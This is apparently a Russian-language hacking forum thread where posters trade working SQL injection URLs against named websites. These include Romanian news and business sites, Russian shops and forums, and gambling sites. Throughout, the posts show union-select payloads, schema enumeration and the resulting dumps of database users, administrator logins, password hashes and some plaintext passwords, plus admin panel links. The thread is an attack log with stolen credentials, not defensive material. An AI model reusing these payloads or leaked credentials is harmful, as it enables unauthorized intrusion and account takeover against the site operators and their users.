http://www.topsport.ro/Web/News.php?NewsID=533+union+select+1,aes_decrypt(aes _encrypt(concat_ws(0x3a,version(),database(),user( )),0x71),0x71),3,4,5,6+limit+1,1/*


Database Version: 4.1.4-gamma-max-log
Database name: topsport
User name: root@localhost


нашел только mysql.user но ничего интересного там нет


http://www.datacont.ro/index2.php?newsid=-93+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Ver sion(),0x3a,Database(),0x3a,User()),0x71),0x71),2, 3,4,5,6,7,8,9,10--


Database Version: 51a-community-log
Database name: datacont_one
User name: datacont_gigiftp@localhost

из information.schema_tables и information.schema_columns интересное только
abcn_users

http://www.datacont.ro/index2.php?newsid=-93+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT((SE LECT+CONCAT(name,login,password)+FROM+datacont_one .abcn_users+LIMIT+0,1)),0x71),0x71),2,3,4,5,6,7,8, 9,10--


Administrator:corada:25033b69ce6b84e5efaf67667bdff b52e1


http://www.dentland.ro/index.php?newsid=28+UNION+SELECT+1,AES_DECRYPT(AES _ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,Use r()),0x71),0x71),3,4,5,6,7,8,9+LIMIT+1,1--


Database Version: 4.1.22-standard-log
Database name: dentland_dent
User name: dentland_dentlan@localhost


http://www.dentland.ro/index.php?newsid=-28+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3a,name,password,username),0x71),0x71),3,4,5,6 ,7,8,9+FROM+jos_users+LIMIT+0,1--

Administrator:ada6360c5d3d4ca341930bd574c9f9aa:0En DhTTFqxPkZGCb:admin



http://www.arhitectura1906.ro/newsdetail.php?id_nws=26+UNION+SELECT+1,2,CONCAT_W S(0x3a,Version(),User(),Database()),4,5,6,7,8,9,10 ,11,12,13,14,15,16+LIMIT+1,1/*


Database Version: 4.1.22-standard
Database name: usr_web15_2
User name: web15@localhost


http://www.3minute.ro/stire.php?NewsID=12746+UNION+SELECT+1,AES_DECRYPT( AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Us er()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21+LIMIT+1,1&NewsCategoryID=13&BackURL=Lw==


Database Version: 5.0.51a-community-log
Database name: minute_db
User name: minute_user@localhost

как ни странно но ничего интересного не нашел в БД..может я не смотрел..но никакого подозрения на наличие пасов или юзеров я не нашел


http://www.btldesign.ro/detalii-noutate.php?newsID=46+UNION+SELECT+1,AES_DECRYPT(A ES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),Use r()),0x71),0x71),3,4,5,6,7,8+LIMIT+1,1/*



Database Version: 4.1.22-standard
Database name: ionradu_btl
User name: ionradu_btl@localhost


http://www.btldesign.ro/detalii-noutate.php?newsID=-46+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3a,pass,user,userid),0x71),0x71),3,4,5,6,7,8+F ROM+user+LIMIT+0,1/*

btldesign2003:admin:1
xadmin:designit:2

http://www.btldesign.ro/admin


http://www.ecotic.ro/comunicate.php?NewsId=-20+UNION+SELECT+1,2,3,4,5,CONCAT_WS(0x3a,User(),Ve rsion(),Database()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22/*


Database Version: 4.1.20-log
Database name: ecotic
User name: ecotic@localhost

http://magureanusiasociatii.eu/news.php?go=fullnews&newsid=-2+union+select+1,2,3,4,CONCAT_WS(0x3a,user(),versi on(),database()),6,7/*

Database Version: 4.0.27-standard
Database name: magurean_gm
User name: magurean@localhost



всем спасибо.

_http://www.viperson.ru/wind.php?ID=-...t+0,1/*&soch=1
Версия():4

mysql.user
user:root
password:1q2w3e
host:%


_http://www.ganzara.ru/internet/book%20/media/?id=-1+union+select+1,2,user(),database(),5,6,version()/*
user():shop96ru@berns.mplik.ru
database():shop96ru
version():5.0.41-log

_http://www.ganzara.ru/internet/book%20/media/?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,name, pass,email)+from+auto_users+limit+0,1/*

_http://www.ganzara.ru/internet/book%20/media/?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,acces s,name,login,passwd,tel,email)+from+ha_users+limit +0,1/*




_http://www.di-do.ru/info.php?id=-1+union+select+version(),database(),3,4,USer(),6,7 ,8,9,10,11/*
user():fenshuj_seller@localhost
database():fenshuj_realshop
version():4.1.22-standard-log


_http://dom-zdorovja.ru/product.php?id=-1+union+select+1,2,user(),database(),5,version(),7 ,8,9,10,11,12,13,14,15,16,17,18,19,20/*
user():domzdor7_alexey@localhost
database():domzdor7_shop
version():4.1.22-log
Ps:Дохлая какай-то тема((


_http://www.inst.ru/catalog.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6/*
user():instruct@v2.valuehost.ru
database():instruct
version():4.0.27-max-log


_http://www.novostroy.ru/directrix/details.php?item_id=-1+union+select+1,database(),3,user(),version(),6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26/*&id=1
user():wwditrix@localhost
database():directrix
version():4.0.27-1-log

магазин техники zvi.ru
http://www.zvi.ru/cat.php?cat=3
Database Version: 5.0.26
Database name: shop2
User name: szvi@localhost
http://www.zvi.ru/cat.php?cat=3%20UNION%20SELECT%201,version(),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16/*
поля для вывода 2,7

http://www.mxmaster.kharkov.ua/index.php?mode=view_full&mx_news_id=101+UNION+SELECT+1,2,concat(mx_username ,0x3a,mx_password),4,5,6,7+FROM+mxmaster_mxmasterd b.mx_admin+LIMIT+1,2/*
root:123123

неподходит :(
http://www.mxmaster.kharkov.ua/admin

ООО "Жилищный капитал", г. Волгоград

http://www.jk-nbik.ru/?alias=show&id=260'

http://www.jk-nbik.ru/?alias=show&id=260+AND+1%3Cascii(substring((SELECT+table_name+ FROM+information_schema.tables+limit+1,1),1,1))

http://www.jk-nbik.ru/?alias=show&id=256++AND+1%3Cascii(substring((SELECT+column_nam e+FROM+information_schema.columns+WHERE+table_name +like+char(105,109,103,101,115)+limit+1,1),1,1))

VERSION(): 5.0.51a-community-log
USER: lipnbikr_sergio@localhost
DATABASE(): lipnbikr_jk


Список таблиц и колонок:

************************************

LLN_catalog

-----------------------------------

id
name
abc
sort

************************************

LLN_check

-----------------------------------

check_id
ch_date
etap
id
proverok
send
status

************************************

LLN_info

-----------------------------------

id
info

************************************

LLN_letters

************************************

LLN_links

-----------------------------------

add_date
backlink
banner
cat
cy
host
id
link
mail
status

************************************

LLN_modules

-----------------------------------

name
sort

************************************

LLN_mylinks

-----------------------------------

id
link
type

***********************************

LLN_values

-----------------------------------

name
value
value_date
value_int

************************************

imges

------------------------------------

Id

************************************

novostroy

------------------------------------

area
building_descr
city
course_usd
direction
highway
how_far
how_far1
how_fast
id
location
location1
obj_rur
obj_usd
obn_descr
obn_link
obn_photo
obn_time
obn_type
org_logo
org_name
orient
phone
price_rur
price_usd

************************************

ut_cities

------------------------------------

c_direction
c_distance
c_id
c_name
c_sort

************************************

ut_img

------------------------------------

active
Descr
Id
ParentID
type

************************************

ut_news

------------------------------------

Data
Descr1
Descr2
Header
Id
img
imgs
isPublic
Press
status

************************************

ut_section

------------------------------------

Alias
isInMap
isInMenu
isPublic
isSearch
Links
MOrderIndex
MParentID
OrderIndex
ParentID
SectionID

************************************

ut_sectiondata

------------------------------------

Content
Descr
Header
Keywords
LangID
mtime
SectionID
Title

************************************

ut_zm

------------------------------------

c_direction
c_distance
c_id
c_name
c_sort

************************************

http://xteam.alion.ru/newsid.php?id=252+union+select+concat_ws(0x3a,user (),version(),database())
таблиц 150+, ничего интересного в первых 35 не увидел, кроме "adminsmail_start"
если интересно кому - попробуйте до конца её =)

Freescience.info - PR 5
http://www.freescience.info/go.php?pagename=books&id=-620+union+select+1,2,3,4,5,6,concat(user(),char(58 ),version(),char(58),database()),8,9,0,11,12,13,14 ,15,16,17--

Design.lookmy.info - PR 4
http://design.lookmy.info/index.php?id=401&show=news&newsid=-15406+union+select+user_id,username,user_password+ from+firstline_base.2103_forum_users+limit+1,1--

Calcutta
http://xteam.alion.ru/newsid.php?id=252+union+select+concat_ws(0x3a,logi n,pass)+from+mp_xteam.users
http://xteam.alion.ru/newsid.php?id=252+union+select+concat_ws(0x3a,user name,user_password)+from+mp_xteam.phpbb_users+limi t+1,1

http://gafgaf.ru/index.php?pid=-1+union+select+1,2,3,4/*


http://gafgaf.ru/index.php?pid=-1+union+select+1,2,3,table_name+from+information_s chema.tables+limit+21,10/*
-------------------------------------------------
http://www.icewarm.com.au/page.php?pIion+select+1,2,3+users/*
Version:4

http://gafgaf.ru/index.php?pid=-1+union+select+1,2,3,password+from+punbb_users+lim it+1,1/*
a1881700b14820a22f6712400f49cb3536fd7dcb
http://gafgaf.ru/index.php?pid=-1+union+select+1,2,3,username+from+punbb_users+lim it+1,1/*
Alexander
http://forum.gafgaf.ru

http://www.icewarm.com.au/page.php?pId=81+union+select+1,2,3+from+mysql.admi n/*
1142: SELECT command denied to user 'dbwwwadmin'@'localhost' for table 'admin'

http://www.fondsk.ru/article.php?id=1' вот что! Версия 5 порылся в информатион схеме нашел в таблице person 2 поля login(http://www.fondsk.ru/article.php?id=1+union+select+1,2,3,4,5,concat(tab le_name,0x3a,COLUMN_NAME),7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26+from+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x706572736f6e+lim it+1,1/*) и mail(ссылку потерял : ( ) ! Пасворда найти не удалось!!! person,author,subscriber воть еще ! Больше нече пдазрительного найти не удалось!

Как грицо Пришел,увидел,по*мел !!! ВОть http://www.stumptuous.com
ВОть http://www.stumptuous.com/cms/displaysection.php?sid=-1+union+select+table_name,2+from+information_schem a.tables/*
ну и воть : http://www.stumptuous.com/cms/displaysection.php?sid=-1+union+select+column_name,2+from+information_sche ma.columns+where+table_name=0x617574686f7220/*

Пас и логин думаю узнать моно за 1 мин! Я не стал! ИМХО бегу в магаз за пивом)

BanQui
Рекоммендую для изучения:

Обновлённый антибоян

http://constant1ne.by.ru/sqls.html

И первый пост этой темы

Очень занимательное чтиво

_www.silversandscasino.com

http://www.silversandscasino.com/silver.asp?goto=1'+or+1=@@version--
http://www.silversandscasino.com/silver.asp?goto=1'%20or%201=(SELECT+TOP+1+email+FR OM+cdrequests+where+id=2000)--

_www.wagerweb.com

http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,3,4,5, 6/*
http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,aes_de crypt(aes_encrypt(concat_ws(0x3a,user(),version(), database()),0x71),0x71),4,5,6/*

root@localhost:5.0.15-nt:sitesmanager2

Rabota.su
http://www.rabota.su/info/makebiz/index.php?id=99999+union+select+concat_ws(0x3a,log in,pwd),2+from+rabota_1.users/*
главная авторизация на сайте.
http://www.rabota.su/info/makebiz/index.php?id=99999+union+select+concat_ws(0x3a,log in,pass),2+from+test.1ckkm_adm_usr/*
поидее админы..
http://www.rabota.su/info/makebiz/index.php?id=99999+union+select+concat_ws(0x3a,log in,pass),2+from+test.my8pref_adm_usr/*
/admin - 500 (

Qanat.info
http://www.qanat.info/en/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,concat_ws(0x3a,version(),user(),database(),0x2 02020202a2623313038303b2623313037363b2623313037373 b2623313039303b202623313039323b2623313038303b26233 13038333b2623313130303b2623313039303b2623313038383 b2623313037323b2623313039343b2623313038303b2623313 130333b2066726f6d2028),18,19,20,21,22/*
наверника фильтрирует from (

Shanson.info
http://shanson.info/mp3/view_cat2.php?id=9999999+union+select+1,2,concat_w s(0x3a,username,user_password)+from+srv12705_sh1fo r.infophpbb3_users--
это пассы от форума, пасс админа в непонятном хеше..
Vlad:$H$9smGyUL04XKl5u16IE4w9MaceJYEqw.

Mkrug.ru - /forum
http://shanson.info/mp3/view_cat2.php?id=9999999+union+select+1,2,concat_w s(0x3a,username,user_password)+from+srv12705_sh1fo r.mkrugphpbb3n_users--
Иван:$H$9Ah37qYJZaSPHfGTDN0MQygFcA1ZWK.

Ogonek.su - /forum
http://shanson.info/mp3/view_cat2.php?id=9999999+union+select+1,2,concat_w s(0x3a,username,user_password)+from+srv12705_etike tt.phpbb_ogonekusers--
admin:$H$9T7Fs09jDWbOgt4NQKRDuOeVs8KhXA/

кароч. там еще много чего интересного )

http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=-13+union+select+1,2,unhex(hex(table_name)),4,5,6+f rom+information_schema.tables/*

----
COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS VIEWS USER_PRIVILEGES categories contacts subcategories columns_priv db func help_category help_keyword help_relation help_topic host proc procs_priv tables_priv time_zone time_zone_leap_second time_zone_name time_zone_transition time_zone_transition_type user challenge_mlb challenge_nba challenge_ncaabk challenge_ncaafb challenge_nfl challenge_nhl comments_mlb comments_nba comments_ncaabk comments_ncaafb comments_nfl comments_nhl consensus_mlb consensus_nba consensus_ncaabk consensus_ncaafb consensus_nfl consensus_nhl picks_mlb picks_nba picks_ncaabk picks_ncaafb picks_nfl picks_nhl points_mlb points_nba points_ncaabk points_ncaafb points_nfl points_nhl team_mlb team_nba team_ncaabk team_ncaafb team_nfl team_nhl advertising ariticle_types art_comments articles articles_experts articles_rating blog_articles blog_arttype blog_sports blog_user ch_home_entry ch_home_entry comments countries coverage deposit_promo emailtemplate endorsements eqrace events faq free_contest globalsitepages globalvariables header_text horse_tracks hot_this_week images_promos inprogress jackpots links mail mail_user mainpagetext marquees matchups media media_feeds media_user metatags picks_pros poll_answers poll_questions poll_votes promos props questions races_information right_buttons send_emails shows smcategories smchannels smindex smprivileges smsections sound_files sports_teams states stats_scores teasers temp_articles topfiveleaders topfivematchups topfiveodds users video_shows winners winners_list writers
http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=-13+union+select+1,2,unhex(hex(column_name)),4,5,6+ from+information_schema.columns+where+table_name=0 x75736572/*

http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=-13+union+select+1,2,unhex(hex(concat_ws(0x3a,usern ,password,email,admin))),4,5,6+from+users/*